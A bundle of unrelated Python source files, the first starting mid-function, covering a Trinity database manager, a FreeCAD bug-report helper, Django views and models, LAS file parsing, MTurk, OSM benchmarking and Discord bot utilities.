# Typeshed definitions for multiprocessing.managers is incomplete, so ignore them for now:
# https://github.com/python/typeshed/blob/85a788dbcaa5e9e9a62e55f15d44530cd28ba830/stdlib/3/multiprocessing/managers.pyi#L3
DBManager.register( # type: ignore
'get_db', callable=lambda: TracebackRecorder(base_db), proxytype=DBProxy)
DBManager.register( # type: ignore
'get_chaindb',
callable=lambda: TracebackRecorder(chaindb),
proxytype=ChainDBProxy,
)
DBManager.register( # type: ignore
'get_chain', callable=lambda: TracebackRecorder(chain), proxytype=ChainProxy)
DBManager.register( # type: ignore
'get_headerdb',
callable=lambda: TracebackRecorder(headerdb),
proxytype=AsyncHeaderDBProxy,
)
DBManager.register( # type: ignore
'get_header_chain',
callable=lambda: TracebackRecorder(header_chain),
proxytype=AsyncHeaderChainProxy,
)
manager = DBManager(address=str(trinity_config.database_ipc_path)) # type: ignore
return manager
def create_db_manager(ipc_path: pathlib.Path) -> BaseManager:
"""
We're still using 'str' here on param ipc_path because an issue with
multi-processing not being able to interpret 'Path' objects correctly
"""
class DBManager(BaseManager):
pass
# Typeshed definitions for multiprocessing.managers is incomplete, so ignore them for now:
# https://github.com/python/typeshed/blob/85a788dbcaa5e9e9a62e55f15d44530cd28ba830/stdlib/3/multiprocessing/managers.pyi#L3
DBManager.register('get_db', proxytype=DBProxy) # type: ignore
DBManager.register('get_chaindb', proxytype=ChainDBProxy) # type: ignore
DBManager.register('get_chain', proxytype=ChainProxy) # type: ignore
DBManager.register('get_headerdb', proxytype=AsyncHeaderDBProxy) # type: ignore
DBManager.register('get_header_chain', proxytype=AsyncHeaderChainProxy) # type: ignore
manager = DBManager(address=str(ipc_path)) # type: ignore
return manager
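# Usage sketch (hypothetical IPC path; a real Trinity process supplies its own):
#
# manager = create_db_manager(pathlib.Path('/tmp/trinity/db.ipc'))
# manager.connect()
# chaindb = manager.get_chaindb()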
|
import FreeCAD
import FreeCADGui as Gui
try:
# ############################################################################
# This part of code has been created by Werner Mayer (wmayer) at forum:
# https://forum.freecadweb.org/viewtopic.php?p=187448#p187448
# ############################################################################
from PySide import QtCore
from PySide import QtGui
class AboutInfo(QtCore.QObject):
def eventFilter(self, obj, ev):
if obj.metaObject().className() == "Gui::Dialog::AboutDialog":
if ev.type() == ev.ChildPolished:
mo = obj.metaObject()
index = mo.indexOfMethod("on_copyButton_clicked()")
if index > 0:
mo.invokeMethod(obj, "on_copyButton_clicked")
QtGui.qApp.postEvent(obj, QtGui.QCloseEvent())
return False
ai=AboutInfo()
QtGui.qApp.installEventFilter(ai)
Gui.runCommand("Std_About")
QtGui.qApp.removeEventFilter(ai)
# ############################################################################
# by Darek L aka dprojects below:
# ############################################################################
def showQtGUI():
class QtMainClass(QtGui.QDialog):
def __init__(self):
super(QtMainClass, self).__init__()
self.initUI()
def initUI(self):
# main window
self.result = userCancelled
self.setGeometry(450, 100, 410, 500)
self.setWindowTitle("Platform details for bug report")
self.setWindowFlags(QtCore.Qt.WindowStaysOnTopHint)
# output
Info = ""
Info += "Has been copied to clipboard: \n"
self.oInfo1 = QtGui.QLabel(Info, self)
self.oInfo1.move(5, 10)
self.o = QtGui.QTextEdit(self)
self.o.setMinimumSize(400, 350)
self.o.setMaximumSize(400, 350)
self.o.move(5, 40)
self.o.setPlainText("")
self.o.paste()
Info = ""
Info += "Note: \n\n"
Info += "CTRL-V - to paste it at your forum topic \n\n"
Info += "CTRL-A, CTRL-C - to copy again"
self.oInfo2 = QtGui.QLabel(Info, self)
self.oInfo2.move(5, 400)
# show
self.show()
userCancelled = "Cancelled"
userOK = "OK"
form = QtMainClass()
form.exec_()
if form.result == userCancelled:
pass
# ###################################################################################################################
# MAIN
# ###################################################################################################################
showQtGUI()
except:
import FreeCAD, FreeCADGui
from PySide import QtGui
from PySide import QtCore
info = ''
    info += 'There was an error while collecting the debug information.' + ' '
    info += 'It probably means <span style="color:red;">your FreeCAD installation is incorrect.</span>' + ' '
    info += 'Try the newest FreeCAD AppImage.' + '<br><br><br>'
    info += 'If you are using Ubuntu 22.04 LTS, you may have to rebuild the AppImage:' + '<br>'
info += '<div style="background-color: #DDDDFF;margin:15px;">'
info += 'chmod +x ./FreeCAD_weekly-build' + '<br>'
info += './FreeCAD_weekly-build --appimage-extract' + '<br>'
info += 'rm -rf ./squashfs-root/usr/lib/libstdc++.so.6' + '<br>'
info += 'rm -rf ./squashfs-root/usr/lib/libstdc++.so' + '<br>'
info += '<a href="https://appimage.github.io/appimagetool/">appimagetool-x86_64.AppImage</a> ./squashfs-root'
info += '</div>'
info += '<br><br><br><br>'
info += 'For more details please see:' + ' '
info += '<a href="https://forum.freecadweb.org/viewtopic.php?p=590997#p590997">FreeCAD forum thread.</a>'
msg = QtGui.QMessageBox()
msg.setTextFormat(QtCore.Qt.TextFormat.RichText)
msg.setText(info)
msg.exec_()
|
def test_num(test):
test_set = [11, 12, 13, 14, 15, 16, 17, 18, 19, 20]
for num in test_set:
if test % num != 0:
return False
return True
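# 2520 is the smallest number divisible by every integer from 1 to 10, so stepping
# by 2520 and testing only 11..20 finds the smallest number divisible by 1..20.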
for x in range(2520, 10000000000, 2520):
if test_num(x):
print("Answer 5:", x)
break
|
from neo4jrestclient.client import GraphDatabase
class Database(object):
def __init__(self, uri, user, password_):
self.db = GraphDatabase(uri, username=user, password=password_)
def close(self):
self.db.close()
def _create_node(self,_label,_name):
# Create one node without relationship
node = self.db.labels.create(_label)
n1 = self.db.nodes.create(name=_name)
node.add(n1)
def _create_two_nodes(self,_label1,_name1,_label2,_name2,_relationship):
# Create some nodes with labels and relationship between then
node_1 = self.db.labels.create(_label1)
node_2 = self.db.labels.create(_label2)
n1 = self.db.nodes.create(name=_name1)
node_1.add(n1)
n2 = self.db.nodes.create(name=_name2)
node_2.add(n2)
n1.relationships.create(_relationship,n2)
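# Usage sketch (hypothetical connection details and node data):
#
# db = Database("http://localhost:7474/db/data/", "neo4j", "password")
# db._create_two_nodes("Person", "Alice", "Person", "Bob", "KNOWS")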
|
# Utilities
#
# Copyright (c) 2012, Gustav Tiger <gustav@tiger.name>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
from __future__ import absolute_import, print_function
import errno
import os
import subprocess
import threading
class Runner:
def __init__(self, directory):
self.directory = directory
# TODO: loop over scripts, check if they are runnable, warn
# then don't warn at runtime.
def get_scripts(self):
scripts = []
for _, _, filenames in os.walk(self.directory):
for filename in filenames:
scripts.append(filename)
return sorted(scripts)
def _run_action(self, action, filename, fit_type):
for script in self.get_scripts():
try:
subprocess.call([os.path.join(self.directory, script),
action, filename, str(fit_type)])
except OSError as e:
print(" - Could not run", script, "-", \
errno.errorcode[e.errno], os.strerror(e.errno))
def run_action(self, action, filename, fit_type):
t = threading.Thread(target=self._run_action, args=(action, filename, fit_type))
t.start()
def run_download(self, filename, fit_type):
self.run_action("DOWNLOAD", filename, fit_type)
def run_upload(self, filename, fit_type):
self.run_action("UPLOAD", filename, fit_type)
def run_delete(self, filename, fit_type):
self.run_action("DELETE", filename, fit_type)
|
import logging
from django.http import Http404
from django.shortcuts import render_to_response
from gibbs.forms import CompoundForm
from gibbs import reaction
from gibbs import conditions
def CompoundPage(request):
"""Renders a page for a particular compound."""
form = CompoundForm(request.GET)
if not form.is_valid():
logging.error(form.errors)
raise Http404
aq_params = conditions.AqueousParams.FromForm(form, request.COOKIES)
rxn = reaction.Reaction.FromForm(form, aq_params)
if len(rxn.reactants) != 1:
logging.error('There must be only 1 reactant in a "compound" page')
raise Http404
compound = rxn.reactants[0].compound
logging.info('Submit = ' + form.cleaned_submit)
if form.cleaned_submit == 'Reset':
logging.info('resetting conditions')
rxn.aq_params = conditions.AqueousParams()
rxn.ResetConcentrations()
compound.StashTransformedSpeciesEnergies(rxn.aq_params)
query = compound.FirstName()
template_data = rxn.GetTemplateData(query)
template_data.update({'compound': compound,
'alberty_link': compound.GetNewPriorityLink(99),
'cc_link': compound.GetNewPriorityLink(1)})
response = render_to_response('compound_page.html', template_data)
rxn.aq_params.SetCookies(response)
return response
|
import ctypes
from .. import utils
NULL_BYTE = b"\x00"
class RawVLRHeader(ctypes.LittleEndianStructure):
""" Close representation of a VLR Header as it is written
in the LAS file.
"""
_fields_ = [
("_reserved", ctypes.c_uint16),
("user_id", ctypes.c_char * 16),
("record_id", ctypes.c_uint16),
("record_length_after_header", ctypes.c_uint16),
("description", ctypes.c_char * 32),
]
@classmethod
def from_stream(cls, stream):
return cls.from_buffer(bytearray(stream.read(ctypes.sizeof(cls))))
VLR_HEADER_SIZE = ctypes.sizeof(RawVLRHeader)
MAX_VLR_RECORD_DATA_LEN = utils.ctypes_max_limit(
RawVLRHeader.record_length_after_header.size
)
class RawVLR:
""" As close as possible to the underlying data
No parsing of the record_data is made,
every piece of data are still bytes.
"""
def __init__(self):
self.header = RawVLRHeader()
self.record_data = b""
@property
def record_data(self):
return self._record_data
@record_data.setter
def record_data(self, value):
if len(value) > MAX_VLR_RECORD_DATA_LEN:
raise OverflowError(
"VLR record data length ({}) exceeds maximum ({})".format(
len(value), MAX_VLR_RECORD_DATA_LEN
)
)
self.header.record_length_after_header = len(value)
self._record_data = value
def size_in_bytes(self):
return VLR_HEADER_SIZE + self.header.record_length_after_header
def write_to(self, out):
""" Write the raw header content to the out stream
Parameters:
----------
out : {file object}
The output stream
"""
out.write(bytes(self.header))
out.write(self.record_data)
@classmethod
def read_from(cls, data_stream):
""" Instantiate a RawVLR by reading the content from the
data stream
Parameters:
----------
data_stream : {file object}
The input stream
Returns
-------
RawVLR
The RawVLR read
"""
raw_vlr = cls()
header = RawVLRHeader.from_stream(data_stream)
raw_vlr.header = header
raw_vlr.record_data = data_stream.read(header.record_length_after_header)
return raw_vlr
def __repr__(self):
return "<RawVLR(user_id: {}, record_id: {}, len: {})>".format(
self.header.user_id,
self.header.record_id,
self.header.record_length_after_header,
)
class BaseVLR:
def __init__(self, user_id, record_id, description=""):
self.user_id = user_id
self.record_id = record_id
self.description = description
class VLR(BaseVLR):
def __init__(self, user_id, record_id, description=""):
super().__init__(user_id, record_id, description=description)
self.record_data = b""
def record_data_bytes(self):
return self.record_data
@classmethod
def from_raw(cls, raw_vlr):
vlr = cls(
raw_vlr.header.user_id.rstrip(NULL_BYTE).decode(),
raw_vlr.header.record_id,
raw_vlr.header.description.rstrip(NULL_BYTE).decode(),
)
vlr.record_data = raw_vlr.record_data
return vlr
def __repr__(self):
return "<{}(user_id: '{}', record_id: '{}', data len: '{}')>".format(
self.__class__.__name__, self.user_id, self.record_id, len(self.record_data)
)
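# Usage sketch (hypothetical stream positioned at the start of a VLR record):
#
# with open("points.las", "rb") as f:
#     f.seek(vlr_offset)  # vlr_offset is an assumption, normally taken from the LAS header
#     vlr = VLR.from_raw(RawVLR.read_from(f))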
|
"""Mixin for shortcut for users resource requests."""
from typing import Optional, Tuple
from uuid import UUID
from botx.bots.mixins.requests.call_protocol import BotXMethodCallProtocol
from botx.clients.methods.v3.users.by_email import ByEmail
from botx.clients.methods.v3.users.by_huid import ByHUID
from botx.clients.methods.v3.users.by_login import ByLogin
from botx.models.messages.sending.credentials import SendingCredentials
from botx.models.users import UserFromSearch
class UsersRequestsMixin:
"""Mixin for shortcut for users resource requests."""
async def search_user(
self: BotXMethodCallProtocol,
credentials: SendingCredentials,
*,
user_huid: Optional[UUID] = None,
email: Optional[str] = None,
ad: Optional[Tuple[str, str]] = None,
) -> UserFromSearch:
"""Search user by one of provided params for search.
Arguments:
credentials: credentials for making request.
user_huid: HUID of user.
email: email of user.
ad: AD login and domain of user.
Returns:
Information about user.
Raises:
ValueError: raised if none of provided params were filled.
"""
if user_huid is not None:
return await self.call_method(
ByHUID(user_huid=user_huid),
credentials=credentials,
)
elif email is not None:
return await self.call_method(ByEmail(email=email), credentials=credentials)
elif ad is not None:
return await self.call_method(
ByLogin(ad_login=ad[0], ad_domain=ad[1]),
credentials=credentials,
)
raise ValueError("one of user_huid, email or ad query_params should be filled")
|
#! /usr/bin/env python
# Usage: dgslandmarks2ndeobj_params.py <dgsfile> <texchan>
# to load landmarks and scalefactor from a .dgsfile
#
# <texchan> e.g. CR03_SPAR_01H_tex
import sys
import json
import dg_file as dgf
import dg_eval
dgsname=sys.argv[1]
texchan=sys.argv[2]
(md,wfmdict)=dgf.loadsnapshot(dgsname)
(ndim,DimLen,IniVal,Step,bases) = dg_eval.geom(wfmdict[texchan])
scalefactor_x=Step[0]*DimLen[0]
scalefactor_y=Step[1]*DimLen[1]
LandmarkDict={}
# We don't distinguish here between landmarks and fiducials
# for the time being
# Also assume only a single surface!!!
surfaceid = 0
for mdname in wfmdict[texchan].MetaData.keys():
if ((mdname.startswith("LANDMARK_")
or mdname.startswith("FIDUCIAL_")) and
mdname.endswith("_X")):
LandmarkName=mdname[9:-2]
LandmarkCoords=(surfaceid,wfmdict[texchan].MetaData[mdname].Value,wfmdict[texchan].MetaData[mdname[:-1]+"Y"].Value)
LandmarkDict[LandmarkName]=LandmarkCoords
pass
# Now dump JSON
# ... suitable for ndepart.fromx3d()
uvparam_params=None # so far...
landmarks_params=(LandmarkDict,{}) # 2nd element is landmarkdict3d, which we do not yet generate
# implpartparams are the parameters of the intrinsic parameterization,
# (lowerleft_meaningfulunits, meaningfulunits_per_texcoord)
# Remember that lowerleft in terms of IniVal is the coordinate of the first point,
# whereas lowerleft in terms of texture is the lower left of the first point
implpartparams = ( (IniVal[0]-Step[0]/2.0,IniVal[1]-Step[1]/2.0), (scalefactor_x,scalefactor_y))
ndepartparams=(uvparam_params,landmarks_params,implpartparams)
ndepart_paramstr = json.dumps(ndepartparams)
print(ndepart_paramstr)
|
import argparse, json
import simpleamt
if __name__ == '__main__':
parser = argparse.ArgumentParser(parents=[simpleamt.get_parent_parser()])
args = parser.parse_args()
mtc = simpleamt.get_mturk_connection_from_args(args)
reject_ids = []
if args.hit_ids_file is None:
parser.error('Must specify --hit_ids_file.')
with open(args.hit_ids_file, 'r') as f:
hit_ids = [line.strip() for line in f]
for hit_id in hit_ids:
try:
for a in mtc.get_assignments(hit_id):
reject_ids.append(a.AssignmentId)
except:
print("Couldn't find hit_id: %s" % (hit_id))
print('This will reject %d assignments with '
'sandbox=%s' % (len(reject_ids), str(args.sandbox)))
print('Continue?')
s = input('(Y/N): ')
if s == 'Y' or s == 'y':
print('Rejecting assignments')
for idx, assignment_id in enumerate(reject_ids):
print('Rejecting assignment %d / %d' % (idx + 1, len(reject_ids)))
try:
mtc.reject_assignment(assignment_id, feedback='Invalid results')
except:
print("Could not reject: %s" % (assignment_id))
else:
print('Aborting')
|
from django.contrib.auth.base_user import AbstractBaseUser
from django.db import models
from ridi_django_oauth2.managers import RidiUserManager
class RidiUser(AbstractBaseUser):
u_idx = models.IntegerField(primary_key=True, editable=False, verbose_name='u_idx')
USERNAME_FIELD = 'u_idx'
objects = RidiUserManager()
class Meta:
db_table = 'ridi_user'
verbose_name = '사용자 계정'
verbose_name_plural = '사용자 계정 리스트'
def __str__(self):
return str(self.get_username())
|
#!/usr/bin/env python3
import csv
import matplotlib.pyplot as plt
def factor_quartiles_graph(input_file, output_file):
with open(input_file, 'r') as csvfile:
plots = csv.reader(csvfile, delimiter=';')
        rows = []
        x = []
        y = []
        # Read the whole CSV first: the first row holds the x values and the
        # second row holds the quartile (y) values; column 0 is a label column.
        for row in plots:
            rows.append(row)
        for j in range(1, len(rows[0])):
            x.append(int(rows[0][j]))
            y.append(int(rows[1][j]))
plt.scatter(x,y, marker='.', color="black")
plt.tight_layout()
plt.yticks([1, 2, 3, 4], ['Q1', 'Q2', 'Q3', 'Q4'])
plt.savefig(output_file, format='eps')
# plt.show()
# plt.close()
factor_quartiles_graph('results/quartiles/apj.csv', 'results/graphs/quartiles/apj.eps')
factor_quartiles_graph('results/quartiles/americas_small.csv', 'results/graphs/quartiles/americas_small.eps')
factor_quartiles_graph('results/quartiles/advertisement.csv', 'results/graphs/quartiles/advertisement.eps')
factor_quartiles_graph('results/quartiles/customer.csv', 'results/graphs/quartiles/customer.eps')
factor_quartiles_graph('results/quartiles/dna.csv', 'results/graphs/quartiles/dna.eps')
factor_quartiles_graph('results/quartiles/firewall1.csv', 'results/graphs/quartiles/firewall1.eps')
factor_quartiles_graph('results/quartiles/tic_tac_toe.csv', 'results/graphs/quartiles/tic_tac_toe.eps')
factor_quartiles_graph('results/quartiles/mushroom.csv', 'results/graphs/quartiles/mushroom.eps')
|
#!/usr/bin/env python2
# Copyright (c) 2019 Erik Schilling
# ALL RIGHTS RESERVED.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
from emuvim.api.osm.pre_configured_osm import PreConfiguredOSM
import csv
with open('ping_pong_parallel_deploy_and_delete_%d.csv' % time.time(), 'w') as csvfile:
fieldnames = ['n', 'start', 'onboard', 'ns_start', 'num_failed', 'ns_delete', 'stop']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
MAX = 30
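    # Sweep the number of parallel ping-pong NS instances from 0 to MAX, timing each phase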
for n in range(0, MAX + 1, 1):
start = time.time()
with PreConfiguredOSM() as osm:
start_done = time.time()
osm.onboard_vnfd('../vnfs/ping_vnf')
osm.onboard_vnfd('../vnfs/pong_vnf')
nsd_id = osm.onboard_nsd('../services/pingpong_ns')
onboard_done = time.time()
for i in range(n):
osm.ns_create('pingpong-test-%d' % i, nsd_id)
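            # Block until every NS is either running or failed, and count the failures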
_, num_failed = osm.ns_wait_until_all_in_status('running', 'failed')
ns_start_done = time.time()
for ns in osm.ns_list():
osm.ns_delete(ns['id'])
osm.ns_wait_until_all_in_status('terminated')
ns_delete_done = time.time()
stop_done = time.time()
measurement = {
'n': n,
'start': start_done - start,
'onboard': onboard_done - start_done,
'ns_start': ns_start_done - onboard_done,
'num_failed': num_failed,
'ns_delete': ns_delete_done - ns_start_done,
'stop': stop_done - ns_delete_done,
}
writer.writerow(measurement)
csvfile.flush()
|
"""
Created on Dec 29, 2016
@author: andrew
"""
import asyncio
import logging
import aiohttp
from discord.ext import commands
import credentials
from cogsmisc.stats import Stats
log = logging.getLogger(__name__)
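# Discord Bot List (discordbots.org, now top.gg) endpoint for posting bot statistics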
DBL_API = "https://discordbots.org/api/bots/"
class Publicity(commands.Cog):
"""
Sends updates to bot repos.
"""
def __init__(self, bot):
self.bot = bot
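        # Only cluster 0 runs the periodic stats update so the guild count is posted once, not once per cluster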
if bot.is_cluster_0:
self.bot.loop.create_task(self.background_update())
async def update_server_count(self):
if self.bot.testing or not credentials.dbl_token:
return
payload = {"server_count": await Stats.get_guild_count(self.bot)}
async with aiohttp.ClientSession() as aioclient:
try:
await aioclient.post(f"{DBL_API}{self.bot.user.id}/stats", data=payload,
headers={"Authorization": credentials.dbl_token})
except Exception as e:
log.error(f"Error posting server count: {e}")
async def background_update(self):
try:
await self.bot.wait_until_ready()
while not self.bot.is_closed():
await self.update_server_count()
await asyncio.sleep(3600) # every hour
except asyncio.CancelledError:
pass
@commands.Cog.listener()
async def on_guild_join(self, server):
log.info('Joined server {}: {}, {} members ({} bot)'.format(server, server.id, len(server.members),
sum(1 for m in server.members if m.bot)))
@commands.Cog.listener()
async def on_guild_remove(self, server):
log.info('Left server {}: {}, {} members ({} bot)'.format(server, server.id, len(server.members),
sum(1 for m in server.members if m.bot)))
def setup(bot):
bot.add_cog(Publicity(bot))
|
import FWCore.ParameterSet.Config as cms
from DQM.GEM.GEMDQMHarvester_cfi import *
from DQMOffline.Muon.gemEfficiencyHarvesterCosmics_cfi import *
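# DQM harvesting sequence for cosmic-ray GEM data: base GEM harvester plus the cosmics efficiency harvesters (standard and one-leg)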
gemClientsCosmics = cms.Sequence(
GEMDQMHarvester *
gemEfficiencyHarvesterCosmics *
gemEfficiencyHarvesterCosmicsOneLeg
)
|